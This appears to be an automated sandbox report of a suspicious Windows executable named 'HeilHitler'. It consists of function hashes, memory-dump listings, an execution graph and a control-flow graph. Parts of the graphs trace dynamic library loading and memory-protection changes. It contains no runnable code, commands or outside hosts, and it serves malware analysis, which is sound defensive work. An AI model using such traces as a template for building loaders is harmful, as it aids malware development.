                                                                                                                                                                                                                                            • Instruction ID: 8eb12bc165134f41b4cb3792588da0e60e246dae2e205a758614a1fe4bf5d5fe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44212372A1868181EB308F51D44627D73B5FB88B84F864335DAADAB394DF7CE9849B40
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                            • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction ID: 761cba639d03aea86463388cd1ad425dde15df9ba6ee47ac9c00dac230985bb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A115B32608B8182EB218F55E400269B7E8FB88B98F584330EF9D5B769DF3CE5518B00
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                            • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction ID: 09a25edd1726398f407d017423dcdbbfe3ab10e57d17ce13637819520ad46471
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01A26291C30386F720AFE0A86327E63A0EF48744F801236D55DEA795EF3CE544AB14

Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 732
Total number of Limit Nodes: 29
84486->84487 84487->84430 84487->84431 84489 7ff633d64e06 84488->84489 84490 7ff633d69390 2 API calls 84489->84490 84491 7ff633d64e1d 84490->84491 84492 7ff633d69390 2 API calls 84491->84492 84492->84493 84493->84486 84494->84418 84495->84418 84496->84418 84497->84418 84498->84418 84499->84418 84500->84418 84501->84418 84502->84441 84503->84440 84504->84418 84505->84470 84507 7ff633d645c0 108 API calls 84506->84507 84508 7ff633d61493 84507->84508 84509 7ff633d6149b 84508->84509 84510 7ff633d614bc 84508->84510 84559 7ff633d62710 54 API calls _log10_special 84509->84559 84512 7ff633d706d4 73 API calls 84510->84512 84514 7ff633d614d1 84512->84514 84513 7ff633d614ab 84513->84447 84515 7ff633d614f8 84514->84515 84516 7ff633d614d5 84514->84516 84520 7ff633d61508 84515->84520 84521 7ff633d61532 84515->84521 84560 7ff633d74f08 11 API calls _get_daylight 84516->84560 84518 7ff633d614da 84561 7ff633d62910 54 API calls _log10_special 84518->84561 84562 7ff633d74f08 11 API calls _get_daylight 84520->84562 84523 7ff633d61538 84521->84523 84531 7ff633d6154b 84521->84531 84537 7ff633d61210 84523->84537 84524 7ff633d61510 84563 7ff633d62910 54 API calls _log10_special 84524->84563 84526 7ff633d614f3 __vcrt_freefls 84528 7ff633d7004c 74 API calls 84526->84528 84530 7ff633d615c4 84528->84530 84529 7ff633d7039c _fread_nolock 53 API calls 84529->84531 84530->84447 84531->84526 84531->84529 84532 7ff633d615d6 84531->84532 84564 7ff633d74f08 11 API calls _get_daylight 84532->84564 84534 7ff633d615db 84565 7ff633d62910 54 API calls _log10_special 84534->84565 84536->84449 84538 7ff633d61268 84537->84538 84539 7ff633d61297 84538->84539 84540 7ff633d6126f 84538->84540 84543 7ff633d612d4 84539->84543 84544 7ff633d612b1 84539->84544 84570 7ff633d62710 54 API calls _log10_special 84540->84570 84542 7ff633d61282 84542->84526 84548 7ff633d612e6 84543->84548 84554 7ff633d61309 memcpy_s 84543->84554 84571 7ff633d74f08 11 API calls _get_daylight 84544->84571 84546 7ff633d612b6 84572 7ff633d62910 
54 API calls _log10_special 84546->84572 84573 7ff633d74f08 11 API calls _get_daylight 84548->84573 84550 7ff633d7039c _fread_nolock 53 API calls 84550->84554 84551 7ff633d612eb 84574 7ff633d62910 54 API calls _log10_special 84551->84574 84553 7ff633d612cf __vcrt_freefls 84553->84526 84554->84550 84554->84553 84557 7ff633d613cf 84554->84557 84558 7ff633d70110 37 API calls 84554->84558 84566 7ff633d70adc 84554->84566 84575 7ff633d62710 54 API calls _log10_special 84557->84575 84558->84554 84559->84513 84560->84518 84561->84526 84562->84524 84563->84526 84564->84534 84565->84526 84567 7ff633d70b0c 84566->84567 84576 7ff633d7082c 84567->84576 84569 7ff633d70b2a 84569->84554 84570->84542 84571->84546 84572->84553 84573->84551 84574->84553 84575->84553 84577 7ff633d7084c 84576->84577 84578 7ff633d70879 84576->84578 84577->84578 84579 7ff633d70856 84577->84579 84580 7ff633d70881 84577->84580 84578->84569 84590 7ff633d7a814 37 API calls 2 library calls 84579->84590 84583 7ff633d7076c 84580->84583 84591 7ff633d7546c EnterCriticalSection 84583->84591 84585 7ff633d70789 84586 7ff633d707ac 74 API calls 84585->84586 84587 7ff633d70792 84586->84587 84588 7ff633d75478 _fread_nolock LeaveCriticalSection 84587->84588 84589 7ff633d7079d 84588->84589 84589->84578 84590->84578 84595 7ff633d749de 84592->84595 84593 7ff633d74a03 84610 7ff633d7a814 37 API calls 2 library calls 84593->84610 84595->84593 84596 7ff633d74a3f 84595->84596 84611 7ff633d72c10 49 API calls _invalid_parameter_noinfo 84596->84611 84598 7ff633d74b1c 84601 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 84598->84601 84599 7ff633d74a2d 84600 7ff633d6c550 _log10_special 8 API calls 84599->84600 84602 7ff633d61cc8 84600->84602 84601->84599 84602->84003 84603 7ff633d74ad6 84603->84598 84604 7ff633d74b40 84603->84604 84605 7ff633d74af1 84603->84605 84608 7ff633d74ae8 84603->84608 84604->84598 84606 7ff633d74b4a 84604->84606 84612 7ff633d7a948 84605->84612 84609 7ff633d7a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 84606->84609 84608->84598 84608->84605 84609->84599 84610->84599 84611->84603 84613 7ff633d7a94d RtlFreeHeap 84612->84613 84614 7ff633d7a97c 84612->84614 84613->84614 84615 7ff633d7a968 GetLastError 84613->84615 84614->84599 84616 7ff633d7a975 Concurrency::details::SchedulerProxy::DeleteThis 84615->84616 84618 7ff633d74f08 11 API calls _get_daylight 84616->84618 84618->84614 84620 7ff633d75ec8 84619->84620 84621 7ff633d75eee 84620->84621 84624 7ff633d75f21 84620->84624 84650 7ff633d74f08 11 API calls _get_daylight 84621->84650 84623 7ff633d75ef3 84651 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84623->84651 84626 7ff633d75f27 84624->84626 84627 7ff633d75f34 84624->84627 84652 7ff633d74f08 11 API calls _get_daylight 84626->84652 84638 7ff633d7ac28 84627->84638 84628 7ff633d64616 84628->84254 84632 7ff633d75f48 84653 7ff633d74f08 11 API calls _get_daylight 84632->84653 84633 7ff633d75f55 84645 7ff633d7fecc 84633->84645 84636 7ff633d75f68 84654 7ff633d75478 LeaveCriticalSection 84636->84654 84655 7ff633d802d8 EnterCriticalSection 84638->84655 84640 7ff633d7ac3f 84641 7ff633d7ac9c 19 API calls 84640->84641 84642 7ff633d7ac4a 84641->84642 84643 7ff633d80338 _isindst LeaveCriticalSection 84642->84643 84644 7ff633d75f3e 84643->84644 84644->84632 84644->84633 84656 7ff633d7fbc8 84645->84656 84648 7ff633d7ff26 84648->84636 84650->84623 84651->84628 84652->84628 84653->84628 84657 7ff633d7fc03 __vcrt_FlsAlloc 84656->84657 84658 7ff633d7fdca 84657->84658 84671 7ff633d77a3c 51 API calls 3 library calls 84657->84671 84662 7ff633d7fdd3 84658->84662 84674 7ff633d74f08 11 API calls _get_daylight 84658->84674 84660 7ff633d7fea1 84675 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84660->84675 84662->84648 84668 7ff633d86d54 84662->84668 84664 7ff633d7fe35 84664->84658 84672 7ff633d77a3c 51 API calls 3 library calls 84664->84672 84666 7ff633d7fe54 84666->84658 84673 7ff633d77a3c 51 API calls 3 library calls 
84666->84673 84676 7ff633d86354 84668->84676 84671->84664 84672->84666 84673->84658 84674->84660 84675->84662 84677 7ff633d8636b 84676->84677 84678 7ff633d86389 84676->84678 84730 7ff633d74f08 11 API calls _get_daylight 84677->84730 84678->84677 84681 7ff633d863a5 84678->84681 84680 7ff633d86370 84731 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84680->84731 84687 7ff633d86964 84681->84687 84684 7ff633d8637c 84684->84648 84733 7ff633d86698 84687->84733 84690 7ff633d869d9 84765 7ff633d74ee8 11 API calls _get_daylight 84690->84765 84691 7ff633d869f1 84753 7ff633d78520 84691->84753 84704 7ff633d863d0 84704->84684 84732 7ff633d784f8 LeaveCriticalSection 84704->84732 84710 7ff633d869de 84766 7ff633d74f08 11 API calls _get_daylight 84710->84766 84730->84680 84731->84684 84734 7ff633d866c4 84733->84734 84738 7ff633d866de 84733->84738 84734->84738 84778 7ff633d74f08 11 API calls _get_daylight 84734->84778 84736 7ff633d866d3 84779 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84736->84779 84740 7ff633d8675c 84738->84740 84780 7ff633d74f08 11 API calls _get_daylight 84738->84780 84739 7ff633d867ad 84749 7ff633d8680a 84739->84749 84784 7ff633d79b78 37 API calls 2 library calls 84739->84784 84740->84739 84782 7ff633d74f08 11 API calls _get_daylight 84740->84782 84743 7ff633d86806 84746 7ff633d86888 84743->84746 84743->84749 84744 7ff633d867a2 84783 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84744->84783 84785 7ff633d7a900 17 API calls __GetCurrentState 84746->84785 84748 7ff633d86751 84781 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84748->84781 84749->84690 84749->84691 84786 7ff633d802d8 EnterCriticalSection 84753->84786 84765->84710 84766->84704 84778->84736 84779->84738 84780->84748 84781->84740 84782->84744 84783->84739 84784->84743 84788 7ff633d778f8 84787->84788 84791 7ff633d773d4 84788->84791 84790 7ff633d77911 84790->84264 84792 7ff633d7741e 84791->84792 84793 7ff633d773ef 84791->84793 84801 7ff633d7546c EnterCriticalSection 84792->84801 
84802 7ff633d7a814 37 API calls 2 library calls 84793->84802 84796 7ff633d77423 84797 7ff633d77440 38 API calls 84796->84797 84798 7ff633d7742f 84797->84798 84799 7ff633d75478 _fread_nolock LeaveCriticalSection 84798->84799 84800 7ff633d7740f 84799->84800 84800->84790 84802->84800 84804 7ff633d6fe43 84803->84804 84805 7ff633d6fe71 84803->84805 84814 7ff633d7a814 37 API calls 2 library calls 84804->84814 84812 7ff633d6fe63 84805->84812 84813 7ff633d7546c EnterCriticalSection 84805->84813 84808 7ff633d6fe88 84809 7ff633d6fea4 72 API calls 84808->84809 84810 7ff633d6fe94 84809->84810 84811 7ff633d75478 _fread_nolock LeaveCriticalSection 84810->84811 84811->84812 84812->84268 84814->84812 84815->84285 84887 7ff633d75628 84888 7ff633d75642 84887->84888 84889 7ff633d7565f 84887->84889 84912 7ff633d74ee8 11 API calls _get_daylight 84888->84912 84889->84888 84891 7ff633d75672 CreateFileW 84889->84891 84893 7ff633d756dc 84891->84893 84894 7ff633d756a6 84891->84894 84892 7ff633d75647 84913 7ff633d74f08 11 API calls _get_daylight 84892->84913 84916 7ff633d75c04 46 API calls 3 library calls 84893->84916 84915 7ff633d7577c 59 API calls 3 library calls 84894->84915 84898 7ff633d756e1 84901 7ff633d756e5 84898->84901 84902 7ff633d75710 84898->84902 84899 7ff633d7564f 84914 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84899->84914 84900 7ff633d756b4 84904 7ff633d756bb CloseHandle 84900->84904 84905 7ff633d756d1 CloseHandle 84900->84905 84917 7ff633d74e7c 11 API calls 2 library calls 84901->84917 84918 7ff633d759c4 51 API calls 84902->84918 84906 7ff633d7565a 84904->84906 84905->84906 84909 7ff633d7571d 84919 7ff633d75b00 21 API calls _fread_nolock 84909->84919 84911 7ff633d756ef 84911->84906 84912->84892 84913->84899 84914->84906 84915->84900 84916->84898 84917->84911 84918->84909 84919->84911 84817 7ffdfaeaf790 84818 7ffdfaeaf7aa 84817->84818 84819 7ffdfaeaf7c0 84818->84819 84821 7ffdfae81f32 84818->84821 84821->84819 84822 7ffdfae98290 84821->84822 84823 7ffdfae982aa 
SetLastError 84822->84823 84824 7ffdfae982d1 84823->84824 84827 7ffdfae82347 84824->84827 84825 7ffdfae982f5 84825->84819 84827->84825 84829 7ffdfae8d370 84827->84829 84830 7ffdfae8d3f5 84829->84830 84831 7ffdfae8d4e5 84829->84831 84833 7ffdfae81253 84829->84833 84830->84825 84831->84830 84832 7ffdfae81253 SetLastError 84831->84832 84832->84831 84833->84831 84834 7ffdfae8dc10 84833->84834 84835 7ffdfae8dc8e SetLastError 84834->84835 84836 7ffdfae8dce6 84834->84836 84835->84834 84835->84836 84836->84831 84920 7ffdfaeaeb80 84922 7ffdfaeaeb9a 84920->84922 84921 7ffdfaeaebb0 84922->84921 84924 7ffdfae8110e 84922->84924 84924->84921 84925 7ffdfae97dc0 84924->84925 84928 7ffdfae97df0 84925->84928 84927 7ffdfae97dda 84927->84921 84929 7ffdfae812ee 84928->84929 84930 7ffdfae97e10 SetLastError 84929->84930 84931 7ffdfae97e37 84930->84931 84934 7ffdfae81b4a 84931->84934 84932 7ffdfae97e79 84932->84927 84934->84932 84937 7ffdfae8c350 84934->84937 84935 7ffdfae8c42f 84935->84932 84937->84935 84941 7ffdfae8195b 84937->84941 84951 7ffdfae81cf8 84937->84951 84957 7ffdfaec652a 84937->84957 84963 7ffdfae8146a 84937->84963 84941->84937 84943 7ffdfae90060 84941->84943 84942 7ffdfae81497 SetLastError 84942->84943 84943->84942 84944 7ffdfae90cb2 84943->84944 84950 7ffdfae901d4 84943->84950 84945 7ffdfae90cbf 00007FFE1FFB6570 84944->84945 84944->84950 84946 7ffdfae90ce0 00007FFE1FFB6570 84945->84946 84945->84950 84947 7ffdfae90d00 00007FFE1FFB6570 84946->84947 84946->84950 84948 7ffdfae90d1b 00007FFE1FFB6570 84947->84948 84947->84950 84949 7ffdfae90d33 00007FFE1FFB6570 84948->84949 84948->84950 84949->84950 84950->84937 84951->84937 84952 7ffdfaec5f60 84951->84952 84953 7ffdfaec667f SetLastError 84952->84953 84955 7ffdfaec676a 84952->84955 84956 7ffdfaec6693 84953->84956 84955->84937 84956->84955 84969 7ffdfaec6140 84956->84969 84958 7ffdfaec6640 84957->84958 84959 7ffdfaec667f SetLastError 84958->84959 84962 7ffdfaec676a 84958->84962 84960 7ffdfaec6693 84959->84960 84961 7ffdfaec6140 
00007FFE13331210 84960->84961 84960->84962 84961->84960 84962->84937 84963->84937 84964 7ffdfaec5e40 84963->84964 84965 7ffdfaec667f SetLastError 84964->84965 84967 7ffdfaec676a 84964->84967 84968 7ffdfaec6693 84965->84968 84966 7ffdfaec6140 00007FFE13331210 84966->84968 84967->84937 84968->84966 84968->84967 84971 7ffdfaec615a 84969->84971 84972 7ffdfaec63df 84971->84972 84973 7ffdfae8119f 00007FFE13331210 84971->84973 84972->84956 84973->84971 84974 7ffdfaea70c0 84975 7ffdfaea70d0 84974->84975 84976 7ffdfaea70e0 84975->84976 84977 7ffdfaec652a 2 API calls 84975->84977 84978 7ffdfae8146a 2 API calls 84975->84978 84979 7ffdfae81cf8 2 API calls 84975->84979 84977->84976 84978->84976 84979->84976 84837 7ffdfb293230 84838 7ffdfb293248 84837->84838 84839 7ffdfb293dd1 84837->84839 84840 7ffdfb293cde LoadLibraryA 84838->84840 84843 7ffdfb293d39 VirtualProtect VirtualProtect 84838->84843 84841 7ffdfb293cf8 84840->84841 84841->84838 84844 7ffdfb293d17 GetProcAddress 84841->84844 84843->84839 84844->84841 84845 7ffdfb293d2e 84844->84845 84846 7ffdfae8b370 84849 7ffdfae8b38f 84846->84849 84847 7ffdfae81253 SetLastError 84848 7ffdfae8b4f2 84847->84848 84849->84847 84849->84848 84850 7ff633d62fe0 84851 7ff633d62ff0 84850->84851 84852 7ff633d6302b 84851->84852 84853 7ff633d63041 84851->84853 84878 7ff633d62710 54 API calls _log10_special 84852->84878 84856 7ff633d63061 84853->84856 84860 7ff633d63077 __vcrt_freefls 84853->84860 84855 7ff633d63037 __vcrt_freefls 84858 7ff633d6c550 _log10_special 8 API calls 84855->84858 84879 7ff633d62710 54 API calls _log10_special 84856->84879 84859 7ff633d631fa 84858->84859 84860->84855 84861 7ff633d61470 116 API calls 84860->84861 84862 7ff633d63349 84860->84862 84863 7ff633d61c80 49 API calls 84860->84863 84865 7ff633d63333 84860->84865 84867 7ff633d6330d 84860->84867 84869 7ff633d63207 84860->84869 84861->84860 84886 7ff633d62710 54 API calls _log10_special 84862->84886 84863->84860 84885 7ff633d62710 54 API calls _log10_special 
84865->84885 84884 7ff633d62710 54 API calls _log10_special 84867->84884 84870 7ff633d63273 84869->84870 84880 7ff633d7a404 37 API calls 2 library calls 84869->84880 84872 7ff633d6329e 84870->84872 84873 7ff633d63290 84870->84873 84882 7ff633d62dd0 37 API calls 84872->84882 84881 7ff633d7a404 37 API calls 2 library calls 84873->84881 84876 7ff633d6329c 84883 7ff633d62500 54 API calls __vcrt_freefls 84876->84883 84878->84855 84879->84855 84880->84870 84881->84876 84882->84876 84883->84855 84884->84855 84885->84855 84886->84855 84980 7ffdfaed7820 84981 7ffdfaed7838 84980->84981 84982 7ffdfaed7946 84981->84982 84983 7ffdfae81b4a 10 API calls 84981->84983 84983->84981

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 7ff633d61000-7ff633d63806 call 7ff633d6fe18 call 7ff633d6fe20 call 7ff633d6c850 call 7ff633d753f0 call 7ff633d75484 call 7ff633d636b0 14 7ff633d63808-7ff633d6380f 0->14 15 7ff633d63814-7ff633d63836 call 7ff633d61950 0->15 16 7ff633d63c97-7ff633d63cb2 call 7ff633d6c550 14->16 21 7ff633d6391b-7ff633d63931 call 7ff633d645c0 15->21 22 7ff633d6383c-7ff633d63856 call 7ff633d61c80 15->22 27 7ff633d6396a-7ff633d6397f call 7ff633d62710 21->27 28 7ff633d63933-7ff633d63960 call 7ff633d67f90 21->28 26 7ff633d6385b-7ff633d6389b call 7ff633d68830 22->26 35 7ff633d6389d-7ff633d638a3 26->35 36 7ff633d638c1-7ff633d638cc call 7ff633d74f30 26->36 42 7ff633d63c8f 27->42 40 7ff633d63962-7ff633d63965 call 7ff633d7004c 28->40 41 7ff633d63984-7ff633d639a6 call 7ff633d61c80 28->41 37 7ff633d638a5-7ff633d638ad 35->37 38 7ff633d638af-7ff633d638bd call 7ff633d689a0 35->38 48 7ff633d639fc-7ff633d63a2a call 7ff633d68940 call 7ff633d689a0 * 3 36->48 49 7ff633d638d2-7ff633d638e1 call 7ff633d68830 36->49 37->38 38->36 40->27 53 7ff633d639b0-7ff633d639b9 41->53 42->16 75 7ff633d63a2f-7ff633d63a3e call 7ff633d68830 48->75 59 7ff633d638e7-7ff633d638ed 49->59 60 7ff633d639f4-7ff633d639f7 call 7ff633d74f30 49->60 53->53 54 7ff633d639bb-7ff633d639d8 call 7ff633d61950 53->54 54->26 65 7ff633d639de-7ff633d639ef call 7ff633d62710 54->65 63 7ff633d638f0-7ff633d638fc 59->63 60->48 67 7ff633d63905-7ff633d63908 63->67 68 7ff633d638fe-7ff633d63903 63->68 65->42 67->60 71 7ff633d6390e-7ff633d63916 call 7ff633d74f30 67->71 68->63 68->67 71->75 79 7ff633d63b45-7ff633d63b53 75->79 80 7ff633d63a44-7ff633d63a47 75->80 82 7ff633d63a67 79->82 83 7ff633d63b59-7ff633d63b5d 79->83 80->79 81 7ff633d63a4d-7ff633d63a50 80->81 84 7ff633d63a56-7ff633d63a5a 81->84 85
7ff633d63b14-7ff633d63b17 81->85 86 7ff633d63a6b-7ff633d63a90 call 7ff633d74f30 82->86 83->86 84->85 89 7ff633d63a60 84->89 87 7ff633d63b19-7ff633d63b1d 85->87 88 7ff633d63b2f-7ff633d63b40 call 7ff633d62710 85->88 95 7ff633d63aab-7ff633d63ac0 86->95 96 7ff633d63a92-7ff633d63aa6 call 7ff633d68940 86->96 87->88 91 7ff633d63b1f-7ff633d63b2a 87->91 97 7ff633d63c7f-7ff633d63c87 88->97 89->82 91->86 99 7ff633d63ac6-7ff633d63aca 95->99 100 7ff633d63be8-7ff633d63bfa call 7ff633d68830 95->100 96->95 97->42 101 7ff633d63bcd-7ff633d63be2 call 7ff633d61940 99->101 102 7ff633d63ad0-7ff633d63ae8 call 7ff633d75250 99->102 108 7ff633d63bfc-7ff633d63c02 100->108 109 7ff633d63c2e 100->109 101->99 101->100 113 7ff633d63aea-7ff633d63b02 call 7ff633d75250 102->113 114 7ff633d63b62-7ff633d63b7a call 7ff633d75250 102->114 111 7ff633d63c04-7ff633d63c1c 108->111 112 7ff633d63c1e-7ff633d63c2c 108->112 115 7ff633d63c31-7ff633d63c40 call 7ff633d74f30 109->115 111->115 112->115 113->101 124 7ff633d63b08-7ff633d63b0f 113->124 122 7ff633d63b7c-7ff633d63b80 114->122 123 7ff633d63b87-7ff633d63b9f call 7ff633d75250 114->123 125 7ff633d63c46-7ff633d63c4a 115->125 126 7ff633d63d41-7ff633d63d63 call 7ff633d644e0 115->126 122->123 135 7ff633d63bac-7ff633d63bc4 call 7ff633d75250 123->135 136 7ff633d63ba1-7ff633d63ba5 123->136 124->101 128 7ff633d63cd4-7ff633d63ce6 call 7ff633d68830 125->128 129 7ff633d63c50-7ff633d63c5f call 7ff633d690e0 125->129 139 7ff633d63d65-7ff633d63d6f call 7ff633d64630 126->139 140 7ff633d63d71-7ff633d63d82 call 7ff633d61c80 126->140 146 7ff633d63ce8-7ff633d63ceb 128->146 147 7ff633d63d35-7ff633d63d3c 128->147 143 7ff633d63cb3-7ff633d63cbd call 7ff633d68660 129->143 144 7ff633d63c61 129->144 135->101 157 7ff633d63bc6 135->157 136->135 148 7ff633d63d87-7ff633d63d96 139->148 140->148 161 7ff633d63cc8-7ff633d63ccf 143->161 162 7ff633d63cbf-7ff633d63cc6 143->162 150 7ff633d63c68 call 7ff633d62710 144->150 146->147 152 7ff633d63ced-7ff633d63d10 call 7ff633d61c80 146->152 147->150 154 
7ff633d63dbc-7ff633d63dd2 call 7ff633d69390 148->154 155 7ff633d63d98-7ff633d63d9f 148->155 165 7ff633d63c6d-7ff633d63c77 150->165 166 7ff633d63d2b-7ff633d63d33 call 7ff633d74f30 152->166 167 7ff633d63d12-7ff633d63d26 call 7ff633d62710 call 7ff633d74f30 152->167 172 7ff633d63dd4 154->172 173 7ff633d63de0-7ff633d63dfc SetDllDirectoryW 154->173 155->154 160 7ff633d63da1-7ff633d63da5 155->160 157->101 160->154 168 7ff633d63da7-7ff633d63db6 LoadLibraryExW 160->168 161->148 162->150 165->97 166->148 167->165 168->154 172->173 176 7ff633d63ef9-7ff633d63f00 173->176 177 7ff633d63e02-7ff633d63e11 call 7ff633d68830 173->177 179 7ff633d63f06-7ff633d63f0d 176->179 180 7ff633d64000-7ff633d64008 176->180 189 7ff633d63e2a-7ff633d63e34 call 7ff633d74f30 177->189 190 7ff633d63e13-7ff633d63e19 177->190 179->180 183 7ff633d63f13-7ff633d63f1d call 7ff633d633c0 179->183 184 7ff633d6400a-7ff633d64027 PostMessageW GetMessageW 180->184 185 7ff633d6402d-7ff633d64038 call 7ff633d636a0 call 7ff633d63360 180->185 183->165 197 7ff633d63f23-7ff633d63f37 call 7ff633d690c0 183->197 184->185 202 7ff633d6403d-7ff633d6405f call 7ff633d63670 call 7ff633d66fc0 call 7ff633d66d70 185->202 199 7ff633d63eea-7ff633d63ef4 call 7ff633d68940 189->199 200 7ff633d63e3a-7ff633d63e40 189->200 194 7ff633d63e1b-7ff633d63e23 190->194 195 7ff633d63e25-7ff633d63e27 190->195 194->195 195->189 210 7ff633d63f5c-7ff633d63f9f call 7ff633d68940 call 7ff633d689e0 call 7ff633d66fc0 call 7ff633d66d70 call 7ff633d688e0 197->210 211 7ff633d63f39-7ff633d63f56 PostMessageW GetMessageW 197->211 199->176 200->199 204 7ff633d63e46-7ff633d63e4c 200->204 208 7ff633d63e57-7ff633d63e59 204->208 209 7ff633d63e4e-7ff633d63e50 204->209 208->176 214 7ff633d63e5f-7ff633d63e7b call 7ff633d66dc0 call 7ff633d67340 208->214 213 7ff633d63e52 209->213 209->214 249 7ff633d63fed-7ff633d63ffb call 7ff633d61900 210->249 250 7ff633d63fa1-7ff633d63fb7 call 7ff633d68ed0 call 7ff633d688e0 210->250 211->210 213->176 228 7ff633d63e7d-7ff633d63e84 214->228 
229 7ff633d63e86-7ff633d63e8d 214->229 233 7ff633d63ed3-7ff633d63ee8 call 7ff633d62a50 call 7ff633d66fc0 call 7ff633d66d70 228->233 230 7ff633d63ea7-7ff633d63eb1 call 7ff633d671b0 229->230 231 7ff633d63e8f-7ff633d63e9c call 7ff633d66e00 229->231 243 7ff633d63ebc-7ff633d63eca call 7ff633d674f0 230->243 244 7ff633d63eb3-7ff633d63eba 230->244 231->230 242 7ff633d63e9e-7ff633d63ea5 231->242 233->176 242->233 243->176 257 7ff633d63ecc 243->257 244->233 249->165 250->249 261 7ff633d63fb9-7ff633d63fce 250->261 257->233 262 7ff633d63fe8 call 7ff633d62a50 261->262 263 7ff633d63fd0-7ff633d63fe3 call 7ff633d62710 call 7ff633d61900 261->263 262->249 263->165
Strings

Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd

Similarity
• API ID: ErrorFileLastModuleName
